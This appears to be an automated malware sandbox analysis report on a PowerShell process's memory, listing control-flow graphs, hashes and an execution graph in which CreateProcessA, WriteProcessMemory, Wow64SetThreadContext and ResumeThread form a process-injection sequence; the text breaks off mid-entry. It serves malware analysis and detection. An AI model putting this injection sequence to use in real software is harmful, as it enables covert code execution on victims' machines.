                                                        • Instruction Fuzzy Hash: 22F06271404344AFEB108A16DCC4B66FFD8EB41724F18C55AED484E286C3799C45CAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:6.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16.7%
                                                        Total number of Nodes:24
                                                        Total number of Limit Nodes:2
                                                        execution_graph 8007 2754a0 8009 2754d3 8007->8009 8008 27609b 8009->8008 8011 276ef8 WriteProcessMemory 8009->8011 8015 277290 8009->8015 8019 276c99 8009->8019 8023 276ca0 8009->8023 8027 276bb0 8009->8027 8011->8009 8016 277317 CreateProcessA 8015->8016 8018 277575 8016->8018 8020 276ce9 Wow64SetThreadContext 8019->8020 8022 276d67 8020->8022 8022->8009 8024 276ce9 Wow64SetThreadContext 8023->8024 8026 276d67 8024->8026 8026->8009 8028 276bf4 ResumeThread 8027->8028 8030 276c46 8028->8030 8030->8009 8031 276039 8033 27564a 8031->8033 8032 27609b 8033->8032 8034 277290 CreateProcessA 8033->8034 8035 276ca0 Wow64SetThreadContext 8033->8035 8036 276c99 Wow64SetThreadContext 8033->8036 8037 276bb0 ResumeThread 8033->8037 8038 276ef8 WriteProcessMemory 8033->8038 8034->8033 8035->8033 8036->8033 8037->8033 8038->8033

                                                        Executed Functions

                                                        Function 002754A0 Relevance: 3.2, Strings: 2, Instructions: 675COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 684 2754a0-2754d1 685 2754d3 684->685 686 2754d8-275540 684->686 685->686 688 275542-275549 call 2760b8 686->688 689 275551-275645 call 272f7c call 274e64 call 271ba8 686->689 691 27554f-275550 688->691 704 27607e-276095 689->704 691->689 705 27609b-2760a2 704->705 706 27564a-275744 call 277290 704->706 713 275746-275761 706->713 714 27576c-2757d6 706->714 713->714 720 2757dd-275809 714->720 721 2757d8 714->721 723 275893-2758e8 720->723 724 27580f-275864 720->724 721->720 731 275910 723->731 732 2758ea-275905 723->732 729 275866-275881 724->729 730 27588c-27588e 724->730 729->730 733 275911-27591b 730->733 731->733 732->731 735 275922-27598c 733->735 736 27591d 733->736 742 2759b4-2759cd 735->742 743 27598e-2759a9 735->743 736->735 744 275a45-275afa 742->744 745 2759cf-275a1d 742->745 743->742 756 275b22-275b83 call 276ef8 744->756 757 275afc-275b17 744->757 745->744 752 275a1f-275a3a 745->752 752->744 763 275b85-275ba0 756->763 764 275bab-275be6 756->764 757->756 763->764 767 275d66-275d85 764->767 768 275beb-275c78 767->768 769 275d8b-275e06 call 276ef8 767->769 777 275c7e-275d0d call 276ef8 768->777 778 275d58-275d60 768->778 779 275e2e-275e64 769->779 780 275e08-275e23 769->780 794 275d0f-275d2f 777->794 778->767 784 275e66-275e69 779->784 785 275e6f-275e85 779->785 780->779 784->785 786 275e87 785->786 787 275e8c-275eb7 785->787 786->787 792 275f41-275f96 787->792 793 275ebd-275eed 787->793 804 275fbe 792->804 805 275f98-275fb3 792->805 825 275ef0 call 276ca0 793->825 826 275ef0 call 276c99 793->826 796 275d57 794->796 797 275d31-275d4c 794->797 796->778 797->796 801 275ef2-275f12 802 275f14-275f2f 801->802 803 275f3a-275f3c 801->803 802->803 806 275fbf-275feb call 276bb0 803->806 804->806 805->804 813 275fed-27600d 806->813 814 276035-276079 813->814 815 27600f-27602a 813->815 814->704 814->705 815->814 825->801 826->801
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ($()j
                                                        • API String ID: 0-3351030596
                                                        • Opcode ID: 4cd68e7ee888f5c9fd0c1187bed7f6b77d7b5688fed8213864708d31444a1067
                                                        • Instruction ID: a3c68d0f7577ce5f24681bf8277d1a90e097ca1de94f7add5ba83bd63af8ca8f
                                                        • Opcode Fuzzy Hash: 4cd68e7ee888f5c9fd0c1187bed7f6b77d7b5688fed8213864708d31444a1067
                                                        • Instruction Fuzzy Hash: 3562C074A10229CFDB69DF68C894BEDB7B2BB89304F1481EAD40DA7295DB305E85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00275172 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 900 275172-275174 901 275176-2751b9 900->901 902 2751d4 900->902 901->902 903 2751d6-2751d8 902->903 904 275234-275240 902->904 903->904 908 275242-275247 904->908 909 27528a-2754d1 904->909 908->909 911 2754d3 909->911 912 2754d8-275540 909->912 911->912 914 275542-275549 call 2760b8 912->914 915 275551-2755b7 call 272f7c 912->915 917 27554f-275550 914->917 922 2755bc-2755d3 call 274e64 915->922 917->915 924 2755d8-275645 call 271ba8 922->924 930 27607e-276095 924->930 931 27609b-2760a2 930->931 932 27564a-2756e1 930->932 937 2756eb-275722 call 277290 932->937 938 275724-275744 937->938 939 275746-275761 938->939 940 27576c-2757d6 938->940 939->940 946 2757dd-275809 940->946 947 2757d8 940->947 949 275893-2758e8 946->949 950 27580f-275864 946->950 947->946 957 275910 949->957 958 2758ea-275905 949->958 955 275866-275881 950->955 956 27588c-27588e 950->956 955->956 959 275911-27591b 956->959 957->959 958->957 961 275922-27598c 959->961 962 27591d 959->962 968 2759b4-2759cd 961->968 969 27598e-2759a9 961->969 962->961 970 275a45-275afa 968->970 971 2759cf-275a1d 968->971 969->968 982 275b22-275b27 970->982 983 275afc-275b17 970->983 971->970 978 275a1f-275a3a 971->978 978->970 986 275b31-275b61 call 276ef8 982->986 983->982 987 275b63-275b83 986->987 989 275b85-275ba0 987->989 990 275bab-275be6 987->990 989->990 993 275d66-275d85 990->993 994 275beb-275c78 993->994 995 275d8b-275dad 993->995 1003 275c7e-275cc9 994->1003 1004 275d58-275d60 994->1004 999 275db7-275de4 call 276ef8 995->999 1002 275de6-275e06 999->1002 1005 275e2e-275e64 1002->1005 1006 275e08-275e23 1002->1006 1016 275cd3-275d0d call 276ef8 1003->1016 1004->993 1010 275e66-275e69 1005->1010 1011 275e6f-275e85 1005->1011 1006->1005 1010->1011 1012 275e87 1011->1012 1013 275e8c-275eb7 1011->1013 1012->1013 1018 275f41-275f96 1013->1018 1019 275ebd-275ec3 1013->1019 1020 275d0f-275d2f 1016->1020 1030 275fbe 1018->1030 1031 275f98-275fb3 1018->1031 1024 275ecd-275eed 1019->1024 1022 275d57 1020->1022 1023 275d31-275d4c 1020->1023 1022->1004 1023->1022 1046 275ef0 call 276ca0 1024->1046 1047 275ef0 call 276c99 1024->1047 1027 275ef2-275f12 1028 275f14-275f2f 1027->1028 1029 275f3a-275f3c 1027->1029 1028->1029 1032 275fbf-275fc4 1029->1032 1030->1032 1031->1030 1036 275fce-275feb call 276bb0 1032->1036 1039 275fed-27600d 1036->1039 1040 276035-276079 1039->1040 1041 27600f-27602a 1039->1041 1040->930 1040->931 1041->1040 1046->1027 1047->1027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PB-
                                                        • API String ID: 0-342722128
                                                        • Opcode ID: e023ec6337baeb71e0af124e21fa968338384f3dd76d10911bcadbda76d57cb9
                                                        • Instruction ID: d7c2dfb49d5ce65c52e65d62f653aa154ba9c44ef0bd0de653196747762fc7f2
                                                        • Opcode Fuzzy Hash: e023ec6337baeb71e0af124e21fa968338384f3dd76d10911bcadbda76d57cb9
                                                        • Instruction Fuzzy Hash: 49614B71E062698FDB65CF29D8507DDBBB2BF8A300F0481EAD448A7261DB304D81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B16D0 Relevance: 21.8, Strings: 17, Instructions: 520COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 9b16d0-9b16df 1 9b16ff 0->1 2 9b16e1-9b16fd 0->2 3 9b1701-9b1703 1->3 2->3 4 9b1709-9b1710 3->4 5 9b17b0-9b17ba 3->5 7 9b1808-9b1810 4->7 8 9b1716-9b171b 4->8 9 9b17bc-9b17c3 5->9 10 9b17c6-9b17cc 5->10 20 9b17e2-9b17fb 7->20 21 9b1812-9b185b 7->21 11 9b171d-9b1723 8->11 12 9b1733-9b1749 8->12 13 9b17ce-9b17d0 10->13 14 9b17d2-9b17de 10->14 16 9b1727-9b1731 11->16 17 9b1725 11->17 12->7 26 9b174f-9b176f 12->26 19 9b17e0 13->19 14->19 16->12 17->12 19->20 27 9b1861-9b1866 21->27 28 9b1ac6-9b1acc 21->28 36 9b17fe-9b1803 26->36 37 9b1775-9b177c 26->37 31 9b1868-9b186e 27->31 32 9b187e-9b1882 27->32 41 9b1a9e-9b1aa3 28->41 42 9b1ace-9b1b0e 28->42 38 9b1872-9b187c 31->38 39 9b1870 31->39 33 9b1888-9b188c 32->33 34 9b1a73-9b1a7d 32->34 43 9b189f 33->43 44 9b188e-9b189d 33->44 45 9b1a8b-9b1a91 34->45 46 9b1a7f-9b1a88 34->46 36->37 47 9b177e-9b1784 37->47 48 9b1796-9b17aa 37->48 38->32 39->32 60 9b1aa5-9b1ac3 41->60 57 9b1c7b-9b1cad 42->57 58 9b1b14-9b1b19 42->58 50 9b18a1-9b18a3 43->50 44->50 51 9b1a93-9b1a95 45->51 52 9b1a97-9b1a99 45->52 55 9b1788-9b1794 47->55 56 9b1786 47->56 48->5 50->34 59 9b18a9-9b18ab 50->59 51->60 52->41 55->48 56->48 81 9b1caf-9b1cbb 57->81 82 9b1cbd 57->82 63 9b1b1b-9b1b21 58->63 64 9b1b31-9b1b35 58->64 65 9b18ca 59->65 66 9b18ad-9b18c8 59->66 68 9b1b23 63->68 69 9b1b25-9b1b2f 63->69 70 9b1b3b-9b1b3d 64->70 71 9b1c2a-9b1c34 64->71 73 9b18cc-9b18ce 65->73 66->73 68->64 69->64 78 9b1b3f-9b1b4b 70->78 79 9b1b4d 70->79 75 9b1c42-9b1c48 71->75 76 9b1c36-9b1c3f 71->76 73->34 80 9b18d4-9b1900 73->80 83 9b1c4a-9b1c4c 75->83 84 9b1c4e-9b1c5a 75->84 86 9b1b4f-9b1b51 78->86 79->86 80->34 114 9b1906-9b1913 80->114 88 9b1cbf-9b1cc1 81->88 82->88 89 9b1c5c-9b1c78 83->89 84->89 86->71 92 9b1b57-9b1b59 86->92 93 9b1d0d-9b1d17 88->93 94 9b1cc3-9b1cc9 88->94 96 9b1b5b-9b1b67 92->96 97 9b1b69 92->97 103 9b1d19-9b1d1f 93->103 104 9b1d22-9b1d28 93->104 99 9b1ccb-9b1ccd 94->99 100 9b1cd7-9b1cf4 94->100 98 9b1b6b-9b1b6d 96->98 97->98 98->71 105 9b1b73-9b1b75 98->105 99->100 120 9b1d5a-9b1d5f 100->120 121 9b1cf6-9b1d07 100->121 106 9b1d2a-9b1d2c 104->106 107 9b1d2e-9b1d3a 104->107 109 9b1b8f-9b1b93 105->109 110 9b1b77-9b1b7d 105->110 111 9b1d3c-9b1d57 106->111 107->111 118 9b1bad-9b1c27 109->118 119 9b1b95-9b1b9b 109->119 115 9b1b7f 110->115 116 9b1b81-9b1b8d 110->116 122 9b1919-9b191e 114->122 123 9b19ac-9b19eb 114->123 115->109 116->109 125 9b1b9f-9b1bab 119->125 126 9b1b9d 119->126 120->121 121->93 127 9b1920-9b1926 122->127 128 9b1936-9b194f 122->128 150 9b19f2-9b1a01 123->150 125->118 126->118 132 9b192a-9b1934 127->132 133 9b1928 127->133 128->123 141 9b1951-9b1973 128->141 132->128 133->128 145 9b198d-9b1997 141->145 146 9b1975-9b197b 141->146 151 9b199c-9b19aa 145->151 147 9b197f-9b198b 146->147 148 9b197d 146->148 147->145 148->145 155 9b1a19-9b1a70 150->155 156 9b1a03-9b1a09 150->156 151->150 157 9b1a0b 156->157 158 9b1a0d-9b1a0f 156->158 157->155 158->155
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p$@=4$@=4$@=4$tPp$tPp$tPp$tPp$$p$$p$$p$$p$$p$$p$[i$[i
                                                        • API String ID: 0-3621546577
                                                        • Opcode ID: a47a71656f405eaa7dfbe2f58e840588a96433d7a9fe2d9350a668a1a1a5c751
                                                        • Instruction ID: 76c0615597af60208acb42f5b394de498fe46d9e8c925ec76e44de958f10f30e
                                                        • Opcode Fuzzy Hash: a47a71656f405eaa7dfbe2f58e840588a96433d7a9fe2d9350a668a1a1a5c751
                                                        • Instruction Fuzzy Hash: 4A024A35B043009FDB248B68D9607BABFE6AFC5320FA8846AD445CB395DE71DD41C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B0F20 Relevance: 14.1, Strings: 11, Instructions: 301COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 9b0f20-9b0f45 161 9b0f4b-9b0f50 160->161 162 9b11ba-9b11c0 160->162 163 9b0f68-9b0f6c 161->163 164 9b0f52-9b0f58 161->164 172 9b1192-9b1197 162->172 173 9b11c2-9b11ed 162->173 167 9b0f72-9b0f76 163->167 168 9b1167-9b1171 163->168 165 9b0f5a 164->165 166 9b0f5c-9b0f66 164->166 165->163 166->163 170 9b0f89 167->170 171 9b0f78-9b0f87 167->171 174 9b117f-9b1185 168->174 175 9b1173-9b117c 168->175 179 9b0f8b-9b0f8d 170->179 171->179 182 9b1199-9b11b7 172->182 180 9b11ef-9b120a 173->180 181 9b120c 173->181 176 9b118b-9b118d 174->176 177 9b1187-9b1189 174->177 176->172 177->182 179->168 185 9b0f93-9b0fb3 179->185 184 9b120e-9b1210 180->184 181->184 187 9b12e6-9b12f0 184->187 188 9b1216-9b121a 184->188 204 9b0fd2 185->204 205 9b0fb5-9b0fd0 185->205 190 9b12fb-9b1301 187->190 191 9b12f2-9b12f8 187->191 192 9b123a 188->192 193 9b121c-9b1238 188->193 195 9b1303-9b1305 190->195 196 9b1307-9b1313 190->196 198 9b123c-9b123e 192->198 193->198 201 9b1315-9b1330 195->201 196->201 198->187 200 9b1244-9b1263 198->200 218 9b127d-9b12a2 200->218 219 9b1265-9b126b 200->219 209 9b0fd4-9b0fd6 204->209 205->209 209->168 212 9b0fdc-9b0fde 209->212 214 9b0fee 212->214 215 9b0fe0-9b0fec 212->215 220 9b0ff0-9b0ff2 214->220 215->220 229 9b12c5 218->229 230 9b12a4-9b12ad 218->230 221 9b126f-9b127b 219->221 222 9b126d 219->222 220->168 223 9b0ff8-9b1017 220->223 221->218 222->218 233 9b1019-9b1025 223->233 234 9b1027 223->234 235 9b12c8-9b12e0 229->235 231 9b12af-9b12b2 230->231 232 9b12b4-9b12c1 230->232 236 9b12c3 231->236 232->236 237 9b1029-9b102b 233->237 234->237 235->187 236->235 237->168 239 9b1031-9b1053 237->239 243 9b106b-9b10d0 239->243 244 9b1055-9b105b 239->244 250 9b10e8-9b10ec 243->250 251 9b10d2-9b10d8 243->251 245 9b105f-9b1061 244->245 246 9b105d 244->246 245->243 246->243 254 9b10f3-9b10f5 250->254 252 9b10da 251->252 253 9b10dc-9b10de 251->253 252->250 253->250 255 9b110d-9b1164 254->255 256 9b10f7-9b10fd 254->256 257 9b10ff 256->257 258 9b1101-9b1103 256->258 257->255 258->255
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p$D<4$D<4$D<4$D<4$h<4$h<4$$p$$p$$p
                                                        • API String ID: 0-787553010
                                                        • Opcode ID: 83e4d2732bd89ca961f9f0305a4e7b4c02da3fcff2653bfe807237a6234b7c6c
                                                        • Instruction ID: e7947e7e00182f332c57ee4f5fa9aec57d10354dcf8f1d60546b405e73b738ae
                                                        • Opcode Fuzzy Hash: 83e4d2732bd89ca961f9f0305a4e7b4c02da3fcff2653bfe807237a6234b7c6c
                                                        • Instruction Fuzzy Hash: 2C914634704301AFDB285A7C8A607BF7BE69FC5320FA4842AD946CB291DE75DD82C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B1828 Relevance: 5.1, Strings: 4, Instructions: 127COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 260 9b1828-9b185b 262 9b1861-9b1866 260->262 263 9b1ac6-9b1acc 260->263 264 9b1868-9b186e 262->264 265 9b187e-9b1882 262->265 271 9b1a9e-9b1aa3 263->271 272 9b1ace-9b1b0e 263->272 268 9b1872-9b187c 264->268 269 9b1870 264->269 266 9b1888-9b188c 265->266 267 9b1a73-9b1a7d 265->267 273 9b189f 266->273 274 9b188e-9b189d 266->274 275 9b1a8b-9b1a91 267->275 276 9b1a7f-9b1a88 267->276 268->265 269->265 285 9b1aa5-9b1ac3 271->285 282 9b1c7b-9b1cad 272->282 283 9b1b14-9b1b19 272->283 278 9b18a1-9b18a3 273->278 274->278 279 9b1a93-9b1a95 275->279 280 9b1a97-9b1a99 275->280 278->267 284 9b18a9-9b18ab 278->284 279->285 280->271 305 9b1caf-9b1cbb 282->305 306 9b1cbd 282->306 287 9b1b1b-9b1b21 283->287 288 9b1b31-9b1b35 283->288 289 9b18ca 284->289 290 9b18ad-9b18c8 284->290 292 9b1b23 287->292 293 9b1b25-9b1b2f 287->293 294 9b1b3b-9b1b3d 288->294 295 9b1c2a-9b1c34 288->295 297 9b18cc-9b18ce 289->297 290->297 292->288 293->288 302 9b1b3f-9b1b4b 294->302 303 9b1b4d 294->303 299 9b1c42-9b1c48 295->299 300 9b1c36-9b1c3f 295->300 297->267 304 9b18d4-9b1900 297->304 307 9b1c4a-9b1c4c 299->307 308 9b1c4e-9b1c5a 299->308 310 9b1b4f-9b1b51 302->310 303->310 304->267 338 9b1906-9b1913 304->338 312 9b1cbf-9b1cc1 305->312 306->312 313 9b1c5c-9b1c78 307->313 308->313 310->295 316 9b1b57-9b1b59 310->316 317 9b1d0d-9b1d17 312->317 318 9b1cc3-9b1cc9 312->318 320 9b1b5b-9b1b67 316->320 321 9b1b69 316->321 327 9b1d19-9b1d1f 317->327 328 9b1d22-9b1d28 317->328 323 9b1ccb-9b1ccd 318->323 324 9b1cd7-9b1cf4 318->324 322 9b1b6b-9b1b6d 320->322 321->322 322->295 329 9b1b73-9b1b75 322->329 323->324 344 9b1d5a-9b1d5f 324->344 345 9b1cf6-9b1d07 324->345 330 9b1d2a-9b1d2c 328->330 331 9b1d2e-9b1d3a 328->331 333 9b1b8f-9b1b93 329->333 334 9b1b77-9b1b7d 329->334 335 9b1d3c-9b1d57 330->335 331->335 342 9b1bad-9b1c27 333->342 343 9b1b95-9b1b9b 333->343 339 9b1b7f 334->339 340 9b1b81-9b1b8d 334->340 346 9b1919-9b191e 338->346 347 9b19ac-9b19eb 338->347 339->333 340->333 349 9b1b9f-9b1bab 343->349 350 9b1b9d 343->350 344->345 345->317 351 9b1920-9b1926 346->351 352 9b1936-9b194f 346->352 374 9b19f2-9b1a01 347->374 349->342 350->342 356 9b192a-9b1934 351->356 357 9b1928 351->357 352->347 365 9b1951-9b1973 352->365 356->352 357->352 369 9b198d-9b1997 365->369 370 9b1975-9b197b 365->370 375 9b199c-9b19aa 369->375 371 9b197f-9b198b 370->371 372 9b197d 370->372 371->369 372->369 379 9b1a19-9b1a70 374->379 380 9b1a03-9b1a09 374->380 375->374 381 9b1a0b 380->381 382 9b1a0d-9b1a0f 380->382 381->379 382->379
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$@=4$@=4$tPp
                                                        • API String ID: 0-325221203
                                                        • Opcode ID: 09a0f9e92248aad7c3e8ab4a1d1f3daed3e7b0213ea70483a6e2b543073b4f4a
                                                        • Instruction ID: 286206734f92cc7a7f4ecac88bd6b1dad0b3a1d43572ebeb3c8164fb51800cab
                                                        • Opcode Fuzzy Hash: 09a0f9e92248aad7c3e8ab4a1d1f3daed3e7b0213ea70483a6e2b543073b4f4a
                                                        • Instruction Fuzzy Hash: A041F630B00204DFCB14CE54D674BEAB7E6AF88720F99C0A9E4049B395CB71ED40CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B1824 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 384 9b1824-9b185b 386 9b1861-9b1866 384->386 387 9b1ac6-9b1acc 384->387 388 9b1868-9b186e 386->388 389 9b187e-9b1882 386->389 395 9b1a9e-9b1aa3 387->395 396 9b1ace-9b1b0e 387->396 392 9b1872-9b187c 388->392 393 9b1870 388->393 390 9b1888-9b188c 389->390 391 9b1a73-9b1a7d 389->391 397 9b189f 390->397 398 9b188e-9b189d 390->398 399 9b1a8b-9b1a91 391->399 400 9b1a7f-9b1a88 391->400 392->389 393->389 409 9b1aa5-9b1ac3 395->409 406 9b1c7b-9b1cad 396->406 407 9b1b14-9b1b19 396->407 402 9b18a1-9b18a3 397->402 398->402 403 9b1a93-9b1a95 399->403 404 9b1a97-9b1a99 399->404 402->391 408 9b18a9-9b18ab 402->408 403->409 404->395 429 9b1caf-9b1cbb 406->429 430 9b1cbd 406->430 411 9b1b1b-9b1b21 407->411 412 9b1b31-9b1b35 407->412 413 9b18ca 408->413 414 9b18ad-9b18c8 408->414 416 9b1b23 411->416 417 9b1b25-9b1b2f 411->417 418 9b1b3b-9b1b3d 412->418 419 9b1c2a-9b1c34 412->419 421 9b18cc-9b18ce 413->421 414->421 416->412 417->412 426 9b1b3f-9b1b4b 418->426 427 9b1b4d 418->427 423 9b1c42-9b1c48 419->423 424 9b1c36-9b1c3f 419->424 421->391 428 9b18d4-9b1900 421->428 431 9b1c4a-9b1c4c 423->431 432 9b1c4e-9b1c5a 423->432 434 9b1b4f-9b1b51 426->434 427->434 428->391 462 9b1906-9b1913 428->462 436 9b1cbf-9b1cc1 429->436 430->436 437 9b1c5c-9b1c78 431->437 432->437 434->419 440 9b1b57-9b1b59 434->440 441 9b1d0d-9b1d17 436->441 442 9b1cc3-9b1cc9 436->442 444 9b1b5b-9b1b67 440->444 445 9b1b69 440->445 451 9b1d19-9b1d1f 441->451 452 9b1d22-9b1d28 441->452 447 9b1ccb-9b1ccd 442->447 448 9b1cd7-9b1cf4 442->448 446 9b1b6b-9b1b6d 444->446 445->446 446->419 453 9b1b73-9b1b75 446->453 447->448 468 9b1d5a-9b1d5f 448->468 469 9b1cf6-9b1d07 448->469 454 9b1d2a-9b1d2c 452->454 455 9b1d2e-9b1d3a 452->455 457 9b1b8f-9b1b93 453->457 458 9b1b77-9b1b7d 453->458 459 9b1d3c-9b1d57 454->459 455->459 466 9b1bad-9b1c27 457->466 467 9b1b95-9b1b9b 457->467 463 9b1b7f 458->463 464 9b1b81-9b1b8d 458->464 470 9b1919-9b191e 462->470 471 9b19ac-9b19eb 462->471 463->457 464->457 473 9b1b9f-9b1bab 467->473 474 9b1b9d 467->474 468->469 469->441 475 9b1920-9b1926 470->475 476 9b1936-9b194f 470->476 498 9b19f2-9b1a01 471->498 473->466 474->466 480 9b192a-9b1934 475->480 481 9b1928 475->481 476->471 489 9b1951-9b1973 476->489 480->476 481->476 493 9b198d-9b1997 489->493 494 9b1975-9b197b 489->494 499 9b199c-9b19aa 493->499 495 9b197f-9b198b 494->495 496 9b197d 494->496 495->493 496->493 503 9b1a19-9b1a70 498->503 504 9b1a03-9b1a09 498->504 499->498 505 9b1a0b 504->505 506 9b1a0d-9b1a0f 504->506 505->503 506->503
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$@=4$@=4$tPp
                                                        • API String ID: 0-325221203
                                                        • Opcode ID: bcf60c381628c8cb96adbfb591ba81350051054debfcb414af01707b036dfc2e
                                                        • Instruction ID: 11a98ae4fef086bf21f1b54c1b187f6b6403d5861d37e13adfbffb506ebc224f
                                                        • Opcode Fuzzy Hash: bcf60c381628c8cb96adbfb591ba81350051054debfcb414af01707b036dfc2e
                                                        • Instruction Fuzzy Hash: 9C41D334B01200DFDB14CE58D674BEAB7E6AF88720FA9C4A9D4059B394CB71DD41CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B1830 Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 508 9b1830-9b185b 509 9b1861-9b1866 508->509 510 9b1ac6-9b1acc 508->510 511 9b1868-9b186e 509->511 512 9b187e-9b1882 509->512 518 9b1a9e-9b1aa3 510->518 519 9b1ace-9b1b0e 510->519 515 9b1872-9b187c 511->515 516 9b1870 511->516 513 9b1888-9b188c 512->513 514 9b1a73-9b1a7d 512->514 520 9b189f 513->520 521 9b188e-9b189d 513->521 522 9b1a8b-9b1a91 514->522 523 9b1a7f-9b1a88 514->523 515->512 516->512 532 9b1aa5-9b1ac3 518->532 529 9b1c7b-9b1cad 519->529 530 9b1b14-9b1b19 519->530 525 9b18a1-9b18a3 520->525 521->525 526 9b1a93-9b1a95 522->526 527 9b1a97-9b1a99 522->527 525->514 531 9b18a9-9b18ab 525->531 526->532 527->518 552 9b1caf-9b1cbb 529->552 553 9b1cbd 529->553 534 9b1b1b-9b1b21 530->534 535 9b1b31-9b1b35 530->535 536 9b18ca 531->536 537 9b18ad-9b18c8 531->537 539 9b1b23 534->539 540 9b1b25-9b1b2f 534->540 541 9b1b3b-9b1b3d 535->541 542 9b1c2a-9b1c34 535->542 544 9b18cc-9b18ce 536->544 537->544 539->535 540->535 549 9b1b3f-9b1b4b 541->549 550 9b1b4d 541->550 546 9b1c42-9b1c48 542->546 547 9b1c36-9b1c3f 542->547 544->514 551 9b18d4-9b1900 544->551 554 9b1c4a-9b1c4c 546->554 555 9b1c4e-9b1c5a 546->555 557 9b1b4f-9b1b51 549->557 550->557 551->514 585 9b1906-9b1913 551->585 559 9b1cbf-9b1cc1 552->559 553->559 560 9b1c5c-9b1c78 554->560 555->560 557->542 563 9b1b57-9b1b59 557->563 564 9b1d0d-9b1d17 559->564 565 9b1cc3-9b1cc9 559->565 567 9b1b5b-9b1b67 563->567 568 9b1b69 563->568 574 9b1d19-9b1d1f 564->574 575 9b1d22-9b1d28 564->575 570 9b1ccb-9b1ccd 565->570 571 9b1cd7-9b1cf4 565->571 569 9b1b6b-9b1b6d 567->569 568->569 569->542 576 9b1b73-9b1b75 569->576 570->571 591 9b1d5a-9b1d5f 571->591 592 9b1cf6-9b1d07 571->592 577 9b1d2a-9b1d2c 575->577 578 9b1d2e-9b1d3a 575->578 580 9b1b8f-9b1b93 576->580 581 9b1b77-9b1b7d 576->581 582 9b1d3c-9b1d57 577->582 578->582 589 9b1bad-9b1c27 580->589 590 9b1b95-9b1b9b 580->590 586 9b1b7f 581->586 587 9b1b81-9b1b8d 581->587 593 9b1919-9b191e 585->593 594 9b19ac-9b19eb 585->594 586->580 587->580 596 9b1b9f-9b1bab 590->596 597 9b1b9d 590->597 591->592 592->564 598 9b1920-9b1926 593->598 599 9b1936-9b194f 593->599 621 9b19f2-9b1a01 594->621 596->589 597->589 603 9b192a-9b1934 598->603 604 9b1928 598->604 599->594 612 9b1951-9b1973 599->612 603->599 604->599 616 9b198d-9b1997 612->616 617 9b1975-9b197b 612->617 622 9b199c-9b19aa 616->622 618 9b197f-9b198b 617->618 619 9b197d 617->619 618->616 619->616 626 9b1a19-9b1a70 621->626 627 9b1a03-9b1a09 621->627 622->621 628 9b1a0b 627->628 629 9b1a0d-9b1a0f 627->629 628->626 629->626
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$@=4$@=4$tPp
                                                        • API String ID: 0-325221203
                                                        • Opcode ID: e173e10e35b7a6bbc19d9d68077556d0be52e5aec6c1189041583ea6bf995657
                                                        • Instruction ID: 9635d5bc4ea0b9509e3e60760fa77842558fac28e7cd178970f612e76f1a7ec2
